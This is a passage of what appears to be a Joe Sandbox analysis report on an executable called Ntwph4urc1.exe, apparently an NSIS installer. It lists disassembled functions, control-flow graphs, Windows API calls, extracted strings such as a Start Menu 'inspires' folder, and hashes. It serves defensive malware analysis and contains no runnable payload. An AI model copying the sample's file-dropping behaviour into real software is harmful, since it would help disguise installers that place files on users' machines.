                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID:
                                            • API String ID: 3282139019-0
                                            • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                            • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                            • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                            • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E
                                            Function 00403ABD Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 295 403abd-403ad5 call 4067e3 298 403ad7-403ae2 GetUserDefaultUILanguage call 406335 295->298 299 403ae9-403b20 call 4062bc 295->299 302 403ae7 298->302 305 403b22-403b33 call 4062bc 299->305 306 403b38-403b3e lstrcatW 299->306 304 403b43-403b6c call 403d93 call 405dcb 302->304 312 403b72-403b77 304->312 313 403bfe-403c06 call 405dcb 304->313 305->306 306->304 312->313 314 403b7d-403ba5 call 4062bc 312->314 319 403c14-403c39 LoadImageW 313->319 320 403c08-403c0f call 40642b 313->320 314->313 321 403ba7-403bab 314->321 323 403cba-403cc2 call 40140b 319->323 324 403c3b-403c6b RegisterClassW 319->324 320->319 325 403bbd-403bc9 lstrlenW 321->325 326 403bad-403bba call 405cf0 321->326 338 403cc4-403cc7 323->338 339 403ccc-403cd7 call 403d93 323->339 327 403c71-403cb5 SystemParametersInfoW CreateWindowExW 324->327 328 403d89 324->328 332 403bf1-403bf9 call 405cc3 call 4063ee 325->332 333 403bcb-403bd9 lstrcmpiW 325->333 326->325 327->323 331 403d8b-403d92 328->331 332->313 333->332 337 403bdb-403be5 GetFileAttributesW 333->337 342 403be7-403be9 337->342 343 403beb-403bec call 405d0f 337->343 338->331 347 403d60-403d61 call 405529 339->347 348 403cdd-403cf7 ShowWindow call 406773 339->348 342->332 342->343 343->332 351 403d66-403d68 347->351 355 403d03-403d15 GetClassInfoW 348->355 356 403cf9-403cfe call 406773 348->356 353 403d82-403d84 call 40140b 351->353 354 403d6a-403d70 351->354 353->328 354->338 357 403d76-403d7d call 40140b 354->357 360 403d17-403d27 GetClassInfoW RegisterClassW 355->360 361 403d2d-403d50 DialogBoxParamW call 40140b 355->361 356->355 357->338 360->361 365 403d55-403d5e call 403a0d 361->365 365->331
                                            APIs
                                              • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                              • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000), ref: 00403AD7
                                              • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                            • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000), ref: 00403B3E
                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,771B3420), ref: 00403BBE
                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires), ref: 00403C25
                                            • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                            • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                            • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                            • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                            • API String ID: 606308-2004444479
                                            • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                            • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                            • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                            • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D
                                            Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 368 403015-403063 GetTickCount GetModuleFileNameW call 405ee4 371 403065-40306a 368->371 372 40306f-40309d call 4063ee call 405d0f call 4063ee GetFileSize 368->372 373 403245-403249 371->373 380 4030a3 372->380 381 403188-403196 call 402fb1 372->381 383 4030a8-4030bf 380->383 388 403198-40319b 381->388 389 4031eb-4031f0 381->389 385 4030c1 383->385 386 4030c3-4030cc call 403444 383->386 385->386 393 4031f2-4031fa call 402fb1 386->393 394 4030d2-4030d9 386->394 391 40319d-4031b5 call 40345a call 403444 388->391 392 4031bf-4031e9 GlobalAlloc call 40345a call 40324c 388->392 389->373 391->389 415 4031b7-4031bd 391->415 392->389 419 4031fc-40320d 392->419 393->389 397 403155-403159 394->397 398 4030db-4030ef call 405e9f 394->398 402 403163-403169 397->402 403 40315b-403162 call 402fb1 397->403 398->402 417 4030f1-4030f8 398->417 410 403178-403180 402->410 411 40316b-403175 call 4068d0 402->411 403->402 410->383 418 403186 410->418 411->410 415->389 415->392 417->402 421 4030fa-403101 417->421 418->381 422 403215-40321a 419->422 423 40320f 419->423 421->402 424 403103-40310a 421->424 425 40321b-403221 422->425 423->422 424->402 427 40310c-403113 424->427 425->425 426 403223-40323e SetFilePointer call 405e9f 425->426 430 403243 426->430 427->402 429 403115-403135 427->429 429->389 431 40313b-40313f 429->431 430->373 432 403141-403145 431->432 433 403147-40314f 431->433 432->418 432->433 433->402 434 403151-403153 433->434 434->402
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00403026
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ntwph4urc1.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                              • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                              • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                            • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                            • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ntwph4urc1.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                            • API String ID: 2803837635-3862075386
                                            • Opcode ID: f652378745d43b93c2f3ffccbc25efe865f8bfd62d9be5f828775b6231d1a4cb
                                            • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                            • Opcode Fuzzy Hash: f652378745d43b93c2f3ffccbc25efe865f8bfd62d9be5f828775b6231d1a4cb
                                            • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D
                                            Function 0040642B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 720 40642b-406436 721 406438-406447 720->721 722 406449-40645f 720->722 721->722 723 406465-406472 722->723 724 406677-40667d 722->724 723->724 725 406478-40647f 723->725 726 406683-40668e 724->726 727 406484-406491 724->727 725->724 729 406690-406694 call 4063ee 726->729 730 406699-40669a 726->730 727->726 728 406497-4064a3 727->728 731 406664 728->731 732 4064a9-4064e7 728->732 729->730 736 406672-406675 731->736 737 406666-406670 731->737 734 406607-40660b 732->734 735 4064ed-4064f8 732->735 740 40660d-406613 734->740 741 40663e-406642 734->741 738 406511 735->738 739 4064fa-4064ff 735->739 736->724 737->724 747 406518-40651f 738->747 739->738 744 406501-406504 739->744 745 406623-40662f call 4063ee 740->745 746 406615-406621 call 406335 740->746 742 406651-406662 lstrlenW 741->742 743 406644-40664c call 40642b 741->743 742->724 743->742 744->738 749 406506-406509 744->749 758 406634-40663a 745->758 746->758 751 406521-406523 747->751 752 406524-406526 747->752 749->738 754 40650b-40650f 749->754 751->752 756 406561-406564 752->756 757 406528-40654f call 4062bc 752->757 754->747 759 406574-406577 756->759 760 406566-406572 GetSystemDirectoryW 756->760 769 406555-40655c call 40642b 757->769 770 4065ef-4065f2 757->770 758->742 762 40663c 758->762 765 4065e2-4065e4 759->765 766 406579-406587 GetWindowsDirectoryW 759->766 764 4065e6-4065ea 760->764 763 4065ff-406605 call 40669d 762->763 763->742 764->763 771 4065ec 764->771 765->764 768 406589-406593 765->768 766->765 776 406595-406598 768->776 777 4065ad-4065c3 SHGetSpecialFolderLocation 768->777 769->764 770->763 774 4065f4-4065fa lstrcatW 770->774 771->770 774->763 776->777 779 40659a-4065a1 776->779 780 4065c5-4065dc SHGetPathFromIDListW CoTaskMemFree 777->780 781 4065de 777->781 782 4065a9-4065ab 779->782 780->764 780->781 781->765 782->764 782->777
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                            • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                            • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                            • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                            • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 717251189-1230650788
                                            • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                            • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                            • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                            • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E
                                            Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 783 40176f-401794 call 402d3e call 405d3a 788 401796-40179c call 4063ee 783->788 789 40179e-4017b0 call 4063ee call 405cc3 lstrcatW 783->789 794 4017b5-4017b6 call 40669d 788->794 789->794 798 4017bb-4017bf 794->798 799 4017c1-4017cb call 40674c 798->799 800 4017f2-4017f5 798->800 808 4017dd-4017ef 799->808 809 4017cd-4017db CompareFileTime 799->809 801 4017f7-4017f8 call 405ebf 800->801 802 4017fd-401819 call 405ee4 800->802 801->802 810 40181b-40181e 802->810 811 40188d-4018b6 call 405456 call 40324c 802->811 808->800 809->808 812 401820-40185e call 4063ee * 2 call 40642b call 4063ee call 405a54 810->812 813 40186f-401879 call 405456 810->813 825 4018b8-4018bc 811->825 826 4018be-4018ca SetFileTime 811->826 812->798 845 401864-401865 812->845 823 401882-401888 813->823 828 402bcb 823->828 825->826 827 4018d0-4018db CloseHandle 825->827 826->827 831 4018e1-4018e4 827->831 832 402bc2-402bc5 827->832 830 402bcd-402bd1 828->830 834 4018e6-4018f7 call 40642b lstrcatW 831->834 835 4018f9-4018fc call 40642b 831->835 832->828 841 401901-402390 834->841 835->841 846 402395-40239a 841->846 847 402390 call 405a54 841->847 845->823 848 401867-401868 845->848 846->830 847->846 848->813
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017B0
                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017D5
                                              • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                              • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                              • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                              • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,771B23A0), ref: 004054B1
                                              • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp$C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                            • API String ID: 1941528284-2998094943
                                            • Opcode ID: 1581b04633949f1bdc692b7a2870eaf759d87e9c25fdc22cdc9577452c9ab1ce
                                            • Instruction ID: cd03b910d30ecf031e582351f340fed2e2266b195dd1fdcb6122cfe31266ec79
                                            • Opcode Fuzzy Hash: 1581b04633949f1bdc692b7a2870eaf759d87e9c25fdc22cdc9577452c9ab1ce
                                            • Instruction Fuzzy Hash: 0B418571510508BACF11BFB5CD85DAE3A79EF45329B20423FF422B11E1DB3C8A519A6E
                                            Function 00405456 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 849 405456-40546b 850 405471-405482 849->850 851 405522-405526 849->851 852 405484-405488 call 40642b 850->852 853 40548d-405499 lstrlenW 850->853 852->853 855 4054b6-4054ba 853->855 856 40549b-4054ab lstrlenW 853->856 858 4054c9-4054cd 855->858 859 4054bc-4054c3 SetWindowTextW 855->859 856->851 857 4054ad-4054b1 lstrcatW 856->857 857->855 860 405513-405515 858->860 861 4054cf-405511 SendMessageW * 3 858->861 859->858 860->851 862 405517-40551a 860->862 861->860 862->851
                                            APIs
                                            • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                            • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                            • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,771B23A0), ref: 004054B1
                                            • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                            • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                            • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                            • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8
                                            Function 00405925 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 863 405925-405970 CreateDirectoryW 864 405972-405974 863->864 865 405976-405983 GetLastError 863->865 866 40599d-40599f 864->866 865->866 867 405985-405999 SetFileSecurityW 865->867 867->864 868 40599b GetLastError 867->868 868->866
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405968
                                            • GetLastError.KERNEL32 ref: 0040597C
